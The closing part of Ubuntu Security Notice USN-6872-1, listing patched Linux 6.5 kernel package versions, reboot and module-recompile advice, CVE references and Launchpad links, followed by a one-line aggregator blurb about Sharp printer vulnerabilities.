     6.5.0.42.42   linux-image-kvm                 6.5.0.42.42   linux-image-laptop-23.10        6.5.0.1018.21   linux-image-raspi               6.5.0.1019.20   linux-image-raspi-nolpae        6.5.0.1019.20   linux-image-virtual             6.5.0.42.42Ubuntu 22.04 LTS   linux-image-6.5.0-1022-nvidia   6.5.0-1022.23   linux-image-6.5.0-1022-nvidia-64k  6.5.0-1022.23   linux-image-6.5.0-1023-gcp      6.5.0-1023.25~22.04.1   linux-image-gcp                 6.5.0.1023.25~22.04.1   linux-image-nvidia-6.5          6.5.0.1022.30   linux-image-nvidia-64k-6.5      6.5.0.1022.30   linux-image-nvidia-64k-hwe-22.04  6.5.0.1022.30   linux-image-nvidia-hwe-22.04    6.5.0.1022.30After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6872-1   CVE-2024-26643, CVE-2024-26809, CVE-2024-26924, CVE-2024-26925Package Information:   https://launchpad.net/ubuntu/+source/linux/6.5.0-42.42   https://launchpad.net/ubuntu/+source/linux-gcp/6.5.0-1023.25   https://launchpad.net/ubuntu/+source/linux-laptop/6.5.0-1018.21   https://launchpad.net/ubuntu/+source/linux-raspi/6.5.0-1019.22   https://launchpad.net/ubuntu/+source/linux-gcp-6.5/6.5.0-1023.25~22.04.1   https://launchpad.net/ubuntu/+source/linux-nvidia-6.5/6.5.0-1022.23

Ubuntu Security Notice USN-6872-1

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Tag

#google